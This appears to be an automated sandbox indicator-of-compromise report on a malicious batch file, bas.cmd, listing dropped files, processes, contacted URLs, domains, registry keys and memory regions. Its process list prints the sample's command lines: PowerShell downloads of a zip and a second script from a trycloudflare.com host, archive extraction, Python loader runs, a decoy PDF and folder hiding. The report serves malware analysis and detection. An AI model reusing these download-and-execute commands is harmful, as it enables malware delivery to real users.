IOC Report
bas.cmd

loading gif

Files

File Path
Type
Category
Malicious
bas.cmd
DOS batch file, ASCII text, with CRLF line terminators
initial sample
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xa76d9efa, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_45ht20tf.23y.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ycachth.hy0.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5suvbnvh.dsm.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jmojxyey.k32.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmonyfee.iot.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5qrap1z.hvm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vrcvuj2l.rao.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vyt0rfry.1ks.ps1
ASCII text, with no line terminators
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\SystemTemp\chrome_BITS_6892_2065776899\BIT4183.tmp
Google Chrome extension, version 3
dropped
C:\Windows\SystemTemp\chrome_BITS_6892_794445048\BITDCFB.tmp
Google Chrome extension, version 3
dropped
C:\Windows\SystemTemp\chrome_BITS_6892_794445048\gonpemdgkjcecdgbnaabipppbmgfggbe_2024.05.14.00_all_pt6odrcwmcz2ifcbvpdpv25i3u.crx3 (copy)
Google Chrome extension, version 3
dropped
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6892_1534472183\LICENSE
ASCII text
dropped
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6892_1534472183\_metadata\verified_contents.json
JSON data
dropped
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6892_1534472183\manifest.fingerprint
ASCII text, with no line terminators
dropped
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6892_1534472183\manifest.json
JSON data
dropped
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6892_1534472183\sets.json
JSON data
dropped
Chrome Cache Entry: 72
HTML document, ASCII text
downloaded
Chrome Cache Entry: 73
HTML document, ASCII text
downloaded
There are 14 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\bas.cmd" "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://gonna-truly-conflict-deserve.trycloudflare.com/jnk8ai.zip' -OutFile 'C:\Users\user\Downloads\jnk8ai.zip' }"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { Expand-Archive -Path 'C:\Users\user\Downloads\jnk8ai.zip' -DestinationPath 'C:\Users\user\Downloads' -Force }"
malicious
C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
python.exe hey.py
malicious
C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
python.exe new.py
malicious
C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
python.exe loader.py
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://gonna-truly-conflict-deserve.trycloudflare.com/update.cmd' -OutFile 'C:\Users\user\Downloads\update.cmd' }"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://floor-contemporary-genius-accommodation.trycloudflare.com/SCANNED.pdf
C:\Windows\System32\timeout.exe
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1992,i,15984810372542594167,14426285752425884727,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://gonna-truly-conflict-deserve.trycloudflare.com/a.pdf
C:\Windows\System32\timeout.exe
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2008,i,13683390946796946304,14765207737704090902,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Windows\System32\attrib.exe
attrib +h "C:\Users\user\Downloads\Python"
There are 6 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://gonna-truly-conflict-deserve.trycloudflare.com
unknown
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://gonna-truly-conflict-deserve.trycloudflare.com/jnk8ai.zip
unknown
malicious
https://wieistmeineip.de
unknown
https://mercadoshops.com.co
unknown
https://gliadomain.com
unknown
https://poalim.xyz
unknown
https://mercadolivre.com
unknown
https://reshim.org
unknown
https://nourishingpursuits.com
unknown
https://medonet.pl
unknown
https://unotv.com
unknown
https://mercadoshops.com.br
unknown
https://joyreactor.cc
unknown
https://zdrowietvn.pl
unknown
https://songstats.com
unknown
https://baomoi.com
unknown
https://supereva.it
unknown
https://elfinancierocr.com
unknown
https://bolasport.com
unknown
https://rws1nvtvt.com
unknown
https://gonna-truly-conflict-deserve.trycloudflare.com/jnk8ai.zip4d
unknown
https://desimartini.com
unknown
https://hearty.app
unknown
https://nuget.org/nuget.exe
unknown
https://hearty.gift
unknown
https://mercadoshops.com
unknown
https://heartymail.com
unknown
https://radio2.be
unknown
https://finn.no
unknown
https://hc1.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://kompas.tv
unknown
https://mystudentdashboard.com
unknown
https://songshare.com
unknown
https://mercadopago.com.mx
unknown
https://talkdeskqaid.com
unknown
https://mercadopago.com.pe
unknown
https://cardsayings.net
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/Icon
unknown
https://mightytext.net
unknown
https://pudelek.pl
unknown
https://joyreactor.com
unknown
http://crl.ver)
unknown
https://cookreactor.com
unknown
https://wildixin.com
unknown
https://eworkbookcloud.com
unknown
https://nacion.com
unknown
https://chennien.com
unknown
https://github.com/Pester/Pester
unknown
https://mercadopago.cl
unknown
https://talkdeskstgid.com
unknown
https://bonvivir.com
unknown
https://carcostadvisor.be
unknown
https://floor-contemporary-genius-accommodation.trycloudflare.com/favicon.ico
104.16.231.132
https://gonna-truly-conflict-deserve.trycloudflare.com/jnk8ai.zipc
unknown
https://salemovetravel.com
unknown
https://wpext.pl
unknown
https://welt.de
unknown
https://poalim.site
unknown
https://blackrockadvisorelite.it
unknown
https://gonna-truly-conflict-deserve.trycloudflare.com/update.cmdCommonPr
unknown
https://cafemedia.com
unknown
https://mercadoshops.com.ar
unknown
https://gonna-truly-conflict-deserve.trycloudflare.com/jnk8ai.zipw
unknown
https://elpais.uy
unknown
https://landyrev.com
unknown
https://commentcamarche.com
unknown
https://tucarro.com.ve
unknown
https://rws3nvtvt.com
unknown
https://eleconomista.net
unknown
https://mercadolivre.com.br
unknown
https://clmbtech.com
unknown
https://standardsandpraiserepurpose.com
unknown
https://salemovefinancial.com
unknown
https://mercadopago.com.br
unknown
https://commentcamarche.net
unknown
https://etfacademy.it
unknown
https://mighty-app.appspot.com
unknown
https://hj.rs
unknown
https://floor-contemporary-genius-accommodation.trycloudflare.com/SCANNED.pdf
https://hearty.me
unknown
https://mercadolibre.com.gt
unknown
https://timesinternet.in
unknown
https://idbs-staging.com
unknown
https://blackrock.com
unknown
https://idbs-eworkbook.com
unknown
https://mercadolibre.co.cr
unknown
https://hjck.com
unknown
https://vrt.be
unknown
https://prisjakt.no
unknown
https://kompas.com
unknown
https://idbs-dev.com
unknown
https://wingify.com
unknown
https://mercadolibre.cl
unknown
https://player.pl
unknown
https://gonna-truly-conflict-deserve.trycloudflare.com/jnk8ai.zip4
unknown
https://mercadopago.com.ar
unknown
https://gonna-truly-conflict-deserve.trycloudflare.com/jnk8ai.zip6
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
gonna-truly-conflict-deserve.trycloudflare.com
unknown
malicious
floor-contemporary-genius-accommodation.trycloudflare.com
104.16.231.132
google.com
142.250.185.206
www.google.com
142.250.186.100

IPs

IP
Domain
Country
Malicious
192.168.2.7
unknown
unknown
104.16.231.132
floor-contemporary-genius-accommodation.trycloudflare.com
United States
239.255.255.250
unknown
Reserved
142.250.186.100
www.google.com
United States
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
21C0ABD0000
heap
page read and write
A065F8E000
stack
page read and write
1F54A81F000
heap
page read and write
22614370000
heap
page read and write
1F54A861000
heap
page read and write
22614458000
heap
page read and write
23D2B5BA000
heap
page read and write
1F545160000
heap
page read and write
7FFAACE50000
trusted library allocation
page read and write
DCCE1FC000
stack
page read and write
1F54528D000
heap
page read and write
1BB50400000
heap
page read and write
23D2EF79000
trusted library allocation
page read and write
22614340000
heap
page read and write
A0667FE000
stack
page read and write
1E516B20000
heap
page read and write
25C5BC91000
trusted library allocation
page read and write
7FFAACD50000
trusted library allocation
page execute and read and write
1F54A744000
trusted library allocation
page read and write
7FFAACBA3000
trusted library allocation
page execute and read and write
7FFAACD30000
trusted library allocation
page read and write
7FFAACED0000
trusted library allocation
page read and write
7FFAACC40000
trusted library allocation
page read and write
1F54AA90000
trusted library allocation
page read and write
1F54A760000
trusted library allocation
page read and write
76C97FD000
stack
page read and write
1F54A8FD000
heap
page read and write
7FFAACE30000
trusted library allocation
page read and write
D00D1FE000
stack
page read and write
7FFAACE20000
trusted library allocation
page read and write
226162A0000
heap
page read and write
25C73E24000
heap
page read and write
EFBF338000
stack
page read and write
7FFAACE90000
trusted library allocation
page read and write
1F54A8EC000
heap
page read and write
23D2D390000
heap
page execute and read and write
7FFB1E0E0000
unkown
page readonly
21C0CC02000
heap
page read and write
7FFAACE00000
trusted library allocation
page read and write
1F545B13000
heap
page read and write
1F54B000000
heap
page read and write
25C5D420000
trusted library allocation
page read and write
7FFAACBA2000
trusted library allocation
page read and write
D00F0FE000
unkown
page readonly
25C59FE3000
trusted library allocation
page read and write
1F545B5C000
heap
page read and write
1F545213000
heap
page read and write
1F546040000
trusted library allocation
page read and write
23D2B5F9000
heap
page read and write
A0663FC000
stack
page read and write
1F54AA10000
trusted library allocation
page read and write
D00E27E000
stack
page read and write
7FFAACBBB000
trusted library allocation
page read and write
7FFAACDE0000
trusted library allocation
page read and write
53F952F000
stack
page read and write
1DC31402000
heap
page read and write
1F5452A1000
heap
page read and write
21C0AC4A000
heap
page read and write
23D2E9F7000
trusted library allocation
page read and write
23D3D401000
trusted library allocation
page read and write
1F54A8F4000
heap
page read and write
1F54A90A000
heap
page read and write
25C73DFF000
heap
page read and write
25C59EDD000
heap
page read and write
25C59FE0000
trusted library allocation
page read and write
1E516C08000
heap
page read and write
7FFAACE40000
trusted library allocation
page read and write
1F5451C0000
trusted library allocation
page read and write
25C59DE0000
heap
page read and write
23D45B70000
heap
page read and write
1F54A745000
trusted library allocation
page read and write
1DC2F602000
heap
page read and write
76C98FC000
stack
page read and write
1DC2F669000
heap
page read and write
21C0AC60000
heap
page read and write
D00D8FE000
unkown
page readonly
A0665F9000
stack
page read and write
7FFAACDF0000
trusted library allocation
page read and write
7FFAACE40000
trusted library allocation
page read and write
21C0AC2B000
heap
page read and write
25C73F10000
heap
page read and write
7FFAACD41000
trusted library allocation
page read and write
AA284CE000
stack
page read and write
A0673CE000
stack
page read and write
23D2D632000
trusted library allocation
page read and write
1BB50465000
heap
page read and write
7FFAACDA0000
trusted library allocation
page read and write
23D2D3F0000
heap
page read and write
1F54A770000
trusted library allocation
page read and write
D00DFFE000
unkown
page readonly
1F545B1C000
heap
page read and write
76C96FF000
stack
page read and write
23D2B5FB000
heap
page read and write
25C73E65000
heap
page read and write
D00DD7E000
stack
page read and write
23D2B5C0000
heap
page read and write
1F54526E000
heap
page read and write
7DF402110000
trusted library allocation
page execute and read and write
23D2E032000
trusted library allocation
page read and write
1F545D01000
trusted library allocation
page read and write
DCCDFFE000
stack
page read and write
21C0AC02000
heap
page read and write
25C73DDA000
heap
page read and write
A0662FF000
stack
page read and write
7FFAACE10000
trusted library allocation
page read and write
1F54A8FB000
heap
page read and write
EFBF7FD000
stack
page read and write
7FFAACEC0000
trusted library allocation
page read and write
1F545329000
heap
page read and write
7FFAACF00000
trusted library allocation
page read and write
25C59E54000
heap
page read and write
CFC3B2C000
stack
page read and write
25C5BBF0000
heap
page execute and read and write
7FFAACE90000
trusted library allocation
page read and write
1F54A6F3000
trusted library allocation
page read and write
A065FCE000
stack
page read and write
25C59EEF000
heap
page read and write
25C6BCA0000
trusted library allocation
page read and write
23D45620000
heap
page execute and read and write
7FFAACE80000
trusted library allocation
page read and write
AA270A3000
stack
page read and write
25C5D5F5000
trusted library allocation
page read and write
25C5A030000
heap
page execute and read and write
1F546330000
trusted library section
page readonly
1DC2F613000
heap
page read and write
1F54AAE0000
remote allocation
page read and write
7FFAACDD0000
trusted library allocation
page read and write
23D2CEE0000
heap
page readonly
1F54A930000
heap
page read and write
1F54522B000
heap
page read and write
23D457AD000
heap
page read and write
25C5D8D2000
trusted library allocation
page read and write
7FFAACD60000
trusted library allocation
page execute and read and write
7FFAACD72000
trusted library allocation
page read and write
7FFAACB94000
trusted library allocation
page read and write
A06677A000
stack
page read and write
A066677000
stack
page read and write
7FFAACBAB000
trusted library allocation
page read and write
23D2CED0000
trusted library allocation
page read and write
25C5D80C000
trusted library allocation
page read and write
23D45510000
heap
page read and write
7FFB1E100000
unkown
page read and write
22616402000
heap
page read and write
7FFAACCC0000
trusted library allocation
page execute and read and write
25C59DC0000
heap
page read and write
23D2B643000
heap
page read and write
D00DDFE000
unkown
page readonly
7FFAACF00000
trusted library allocation
page read and write
7FFAACE20000
trusted library allocation
page read and write
23D2E57D000
trusted library allocation
page read and write
1F545200000
heap
page read and write
1E516A40000
heap
page read and write
23D2B670000
heap
page read and write
D00DB7E000
stack
page read and write
7FFAACD90000
trusted library allocation
page execute and read and write
23D2D489000
trusted library allocation
page read and write
7FFB1E102000
unkown
page readonly
7FFAACD90000
trusted library allocation
page read and write
D00DEFE000
unkown
page readonly
25C74166000
heap
page read and write
25C6BF81000
trusted library allocation
page read and write
1F545B1B000
heap
page read and write
21C0C670000
heap
page read and write
1F54A8A0000
trusted library allocation
page read and write
1F5466B0000
trusted library allocation
page read and write
7FFAACDC0000
trusted library allocation
page read and write
A0668FE000
stack
page read and write
25C73F30000
heap
page read and write
D00E17E000
stack
page read and write
1F546300000
trusted library section
page readonly
23D45400000
heap
page read and write
1DC2F520000
heap
page read and write
7FFAACD4A000
trusted library allocation
page read and write
7FFAACBFC000
trusted library allocation
page execute and read and write
1F5452A3000
heap
page read and write
1DC2F702000
heap
page read and write
25C5BEC1000
trusted library allocation
page read and write
23D2D2B0000
trusted library allocation
page read and write
22614502000
heap
page read and write
7FFAACBA0000
trusted library allocation
page read and write
7FFAACDC0000
trusted library allocation
page read and write
7FFAACCB0000
trusted library allocation
page execute and read and write
1F545B9E000
heap
page read and write
25C5D5F7000
trusted library allocation
page read and write
7FFAACE70000
trusted library allocation
page read and write
1F5451D0000
trusted library section
page read and write
AA2787B000
stack
page read and write
7FFAACDA0000
trusted library allocation
page read and write
1F54A780000
trusted library allocation
page read and write
23D2D401000
trusted library allocation
page read and write
1F54AA10000
trusted library allocation
page read and write
D00EAFE000
unkown
page readonly
23D455D7000
heap
page read and write
1F54A90A000
heap
page read and write
21C0AC13000
heap
page read and write
1F54A6B0000
trusted library allocation
page read and write
1E518670000
heap
page read and write
AA274FD000
stack
page read and write
1BB4EB38000
heap
page read and write
7FFAACED0000
trusted library allocation
page read and write
7FFAACE10000
trusted library allocation
page read and write
7FFAACB9D000
trusted library allocation
page execute and read and write
1F545B5C000
heap
page read and write
25C5A037000
heap
page execute and read and write
1F54A8C2000
heap
page read and write
25C7413A000
heap
page read and write
25C59E56000
heap
page read and write
1F545B1A000
heap
page read and write
25C5D649000
trusted library allocation
page read and write
1F545A15000
heap
page read and write
22614402000
heap
page read and write
1F54A8C4000
heap
page read and write
DCCDCFE000
stack
page read and write
7FFAACEA0000
trusted library allocation
page read and write
1DC2F440000
heap
page read and write
25C73E75000
heap
page read and write
21C0CB30000
heap
page read and write
1F54A784000
trusted library allocation
page read and write
A0669FB000
stack
page read and write
1F54A741000
trusted library allocation
page read and write
AA271EF000
stack
page read and write
22614446000
heap
page read and write
7FFAACBEC000
trusted library allocation
page execute and read and write
23D2D273000
trusted library allocation
page read and write
D00CFF7000
stack
page read and write
76C94FF000
stack
page read and write
1F545296000
heap
page read and write
1F54A854000
heap
page read and write
7FFAACD60000
trusted library allocation
page execute and read and write
1F545190000
heap
page read and write
23D2B63A000
heap
page read and write
D00D0FE000
unkown
page readonly
1DC2F600000
heap
page read and write
7FFB1D60D000
unkown
page readonly
25C73DA0000
heap
page read and write
23D2B577000
heap
page read and write
7FFAACE60000
trusted library allocation
page read and write
25C5A020000
trusted library allocation
page read and write
25C5D8D6000
trusted library allocation
page read and write
7FFB1E0E1000
unkown
page execute read
AA276F9000
stack
page read and write
1F54A740000
trusted library allocation
page read and write
76C92F7000
stack
page read and write
23D2B63C000
heap
page read and write
1F545B00000
heap
page read and write
1F54A6C0000
trusted library allocation
page read and write
DCCDDFE000
stack
page read and write
23D2B5B4000
heap
page read and write
AA2797E000
stack
page read and write
23D2B6C4000
heap
page read and write
7FFB1D609000
unkown
page readonly
1F545180000
heap
page read and write
7FFAACD80000
trusted library allocation
page execute and read and write
1F5452FF000
heap
page read and write
23D457A0000
heap
page read and write
AA277FA000
stack
page read and write
1F54A941000
heap
page read and write
AA2844F000
stack
page read and write
EFBFAFE000
stack
page read and write
1F54A82C000
heap
page read and write
7FFAACC50000
trusted library allocation
page read and write
7FFAACC56000
trusted library allocation
page read and write
D00DBFE000
unkown
page readonly
D00E5FB000
stack
page read and write
23D2CEB0000
trusted library allocation
page read and write
D00E3FE000
stack
page read and write
1DC2F655000
heap
page read and write
A06687F000
stack
page read and write
7FFAACBA0000
trusted library allocation
page read and write
1F545B5C000
heap
page read and write
D00E2FE000
unkown
page readonly
EFBFBFC000
stack
page read and write
76C93FE000
stack
page read and write
25C74159000
heap
page read and write
A06744D000
stack
page read and write
7FFAACBA4000
trusted library allocation
page read and write
25C6BD07000
trusted library allocation
page read and write
A065F03000
stack
page read and write
23D45626000
heap
page execute and read and write
D00E1FE000
unkown
page readonly
1F54A780000
trusted library allocation
page read and write
EFBF8FF000
stack
page read and write
A06697E000
stack
page read and write
25C5D5EF000
trusted library allocation
page read and write
21C0AC69000
heap
page read and write
D00D6FE000
unkown
page readonly
1F546310000
trusted library section
page readonly
D00E0FE000
unkown
page readonly
1F546350000
trusted library section
page readonly
21C0AC00000
heap
page read and write
D00F07E000
stack
page read and write
7FFB1D606000
unkown
page readonly
7FFAACB93000
trusted library allocation
page execute and read and write
23D2F03E000
trusted library allocation
page read and write
1F54525B000
heap
page read and write
AA27777000
stack
page read and write
D00E9FB000
stack
page read and write
1F54A8FE000
heap
page read and write
1F546220000
trusted library allocation
page read and write
2261442B000
heap
page read and write
23D456C0000
heap
page read and write
AA278FE000
stack
page read and write
1BB4EC30000
heap
page read and write
A0664FE000
stack
page read and write
23D2CEF4000
heap
page read and write
23D455BE000
heap
page read and write
1F54A842000
heap
page read and write
7FFB1E0F6000
unkown
page readonly
D00D7F9000
stack
page read and write
EFBF6FF000
stack
page read and write
7FFAACDF0000
trusted library allocation
page read and write
7FFAACBAD000
trusted library allocation
page execute and read and write
7FFAACC5C000
trusted library allocation
page execute and read and write
7FFAACBC0000
trusted library allocation
page read and write
23D2B480000
heap
page read and write
D00E6FE000
unkown
page readonly
7FFAACD70000
trusted library allocation
page execute and read and write
7FFAACC86000
trusted library allocation
page execute and read and write
23D3D40F000
trusted library allocation
page read and write
AA2767D000
stack
page read and write
1F545274000
heap
page read and write
7FFAACDB0000
trusted library allocation
page read and write
25C73C98000
heap
page read and write
1F54A920000
heap
page read and write
1F54A799000
trusted library allocation
page read and write
7FFAACD51000
trusted library allocation
page read and write
1F54A922000
heap
page read and write
25C59ECF000
heap
page read and write
23D456A0000
heap
page read and write
D00EB7E000
stack
page read and write
25C5BC10000
heap
page execute and read and write
AA271AE000
stack
page read and write
53F95AF000
stack
page read and write
D00DF7E000
stack
page read and write
22614460000
heap
page read and write
1E516B60000
heap
page read and write
DCCD937000
stack
page read and write
25C73DFD000
heap
page read and write
1F54A902000
heap
page read and write
D00D5FE000
stack
page read and write
23D455EC000
heap
page read and write
1F545B1B000
heap
page read and write
7FFAACE80000
trusted library allocation
page read and write
7FFAACE00000
trusted library allocation
page read and write
1F545A02000
heap
page read and write
AA275FE000
stack
page read and write
53F94AC000
stack
page read and write
7FFAACD40000
trusted library allocation
page read and write
23D3D472000
trusted library allocation
page read and write
1F54AAE0000
remote allocation
page read and write
23D2B690000
heap
page read and write
DCCDEFD000
stack
page read and write
25C5A060000
heap
page read and write
23D3D5B5000
trusted library allocation
page read and write
25C5D417000
trusted library allocation
page read and write
EFBF9FF000
stack
page read and write
22614400000
heap
page read and write
23D4555D000
heap
page read and write
7FFAACEF0000
trusted library allocation
page read and write
7FFAACBB0000
trusted library allocation
page read and write
23D45517000
heap
page read and write
7FFAACDD0000
trusted library allocation
page read and write
7FFAACB92000
trusted library allocation
page read and write
A06627E000
stack
page read and write
7FFB1D5F0000
unkown
page readonly
D00D4FE000
unkown
page readonly
1F5459E1000
trusted library allocation
page read and write
1F54A740000
trusted library allocation
page read and write
7FFAACEF0000
trusted library allocation
page read and write
7FFAACC60000
trusted library allocation
page execute and read and write
21C0ABF0000
heap
page read and write
1F54AAE0000
remote allocation
page read and write
25C59E70000
trusted library allocation
page read and write
7FFAACC4C000
trusted library allocation
page execute and read and write
A06637E000
stack
page read and write
7FFB1D610000
unkown
page read and write
A06647E000
stack
page read and write
AA27A7C000
stack
page read and write
1E516C00000
heap
page read and write
1F54A90A000
heap
page read and write
23D2B5D2000
heap
page read and write
1F545291000
heap
page read and write
1DC2F62B000
heap
page read and write
7FFAACBB0000
trusted library allocation
page read and write
1DC2F420000
heap
page read and write
A0666F7000
stack
page read and write
1F54A8CF000
heap
page read and write
1F54A770000
trusted library allocation
page read and write
7FFAACDE0000
trusted library allocation
page read and write
7FFAACD82000
trusted library allocation
page read and write
25C5D288000
trusted library allocation
page read and write
25C59F1A000
heap
page read and write
1F54AA20000
trusted library allocation
page read and write
1F54A6F0000
trusted library allocation
page read and write
D00D3FB000
stack
page read and write
1F54A800000
heap
page read and write
25C6BE49000
trusted library allocation
page read and write
1F545B1A000
heap
page read and write
1F54A90C000
heap
page read and write
25C59FA0000
heap
page readonly
23D2CEF0000
heap
page read and write
1F54A746000
trusted library allocation
page read and write
D00DCFE000
unkown
page readonly
22614360000
heap
page read and write
AA2757E000
stack
page read and write
1F545A00000
heap
page read and write
23D2CE70000
heap
page read and write
21C0AD02000
heap
page read and write
25C74128000
heap
page read and write
AA2854D000
stack
page read and write
1BB4EB30000
heap
page read and write
1F54A84F000
heap
page read and write
23D2B5B1000
heap
page read and write
D00DE7D000
stack
page read and write
25C59ED3000
heap
page read and write
1F545313000
heap
page read and write
7FFAACDB0000
trusted library allocation
page read and write
7FFAACE60000
trusted library allocation
page read and write
D00E4FE000
unkown
page readonly
1F546340000
trusted library section
page readonly
1F54A8D7000
heap
page read and write
2261444A000
heap
page read and write
1DC31380000
heap
page read and write
1E518674000
heap
page read and write
1F54A88C000
heap
page read and write
22614413000
heap
page read and write
7FFAACD5A000
trusted library allocation
page read and write
1F54A720000
trusted library allocation
page read and write
D00E07E000
stack
page read and write
25C5A064000
heap
page read and write
25C73E4D000
heap
page read and write
1F54AA80000
trusted library allocation
page read and write
25C59ED7000
heap
page read and write
D00DC7E000
stack
page read and write
1F5452B1000
heap
page read and write
25C74110000
heap
page read and write
A06657D000
stack
page read and write
1F54A918000
heap
page read and write
7FFAACD32000
trusted library allocation
page read and write
25C59F16000
heap
page read and write
AA2712E000
stack
page read and write
D00D9FB000
stack
page read and write
76C95FD000
stack
page read and write
23D2D380000
heap
page execute and read and write
1DC2F64A000
heap
page read and write
25C5BC80000
heap
page read and write
1BB50460000
heap
page read and write
1F54A890000
trusted library allocation
page read and write
23D2B570000
heap
page read and write
AA2747E000
stack
page read and write
25C5BD18000
trusted library allocation
page read and write
7FFAACC50000
trusted library allocation
page execute and read and write
25C59F90000
trusted library allocation
page read and write
1F54A85E000
heap
page read and write
1F545B02000
heap
page read and write
25C74120000
heap
page read and write
25C59CE0000
heap
page read and write
DCCE0FD000
stack
page read and write
23D3D6EC000
trusted library allocation
page read and write
1F545240000
heap
page read and write
7FFAACC46000
trusted library allocation
page read and write
1F54A730000
trusted library allocation
page read and write
23D2D270000
trusted library allocation
page read and write
7FFB1E105000
unkown
page readonly
D00E7FE000
stack
page read and write
23D2B6C0000
heap
page read and write
23D2CEF6000
heap
page read and write
7FFAACEE0000
trusted library allocation
page read and write
D00DAFE000
unkown
page readonly
25C5C8C1000
trusted library allocation
page read and write
7FFAACF10000
trusted library allocation
page read and write
D00D2FE000
unkown
page readonly
25C59E50000
heap
page read and write
1F54A8F0000
heap
page read and write
25C59E90000
heap
page read and write
1F54AA70000
trusted library allocation
page read and write
1BB4EA40000
heap
page read and write
7FFAACC76000
trusted library allocation
page execute and read and write
1F545302000
heap
page read and write
1F54A742000
trusted library allocation
page read and write
1F54A902000
heap
page read and write
7FFAACE70000
trusted library allocation
page read and write
7FFAACE30000
trusted library allocation
page read and write
7FFAACEC0000
trusted library allocation
page read and write
25C59E20000
heap
page read and write
7FFAACEB0000
trusted library allocation
page read and write
7FFAACE50000
trusted library allocation
page read and write
1F54A90E000
heap
page read and write
1F545277000
heap
page read and write
23D2F042000
trusted library allocation
page read and write
7FFAACEE0000
trusted library allocation
page read and write
1F546320000
trusted library section
page readonly
7FFAACEB0000
trusted library allocation
page read and write
25C73DBE000
heap
page read and write
1DC2F660000
heap
page read and write
23D2E9F2000
trusted library allocation
page read and write
7FFAACEA0000
trusted library allocation
page read and write
25C73F33000
heap
page read and write
25C6BC91000
trusted library allocation
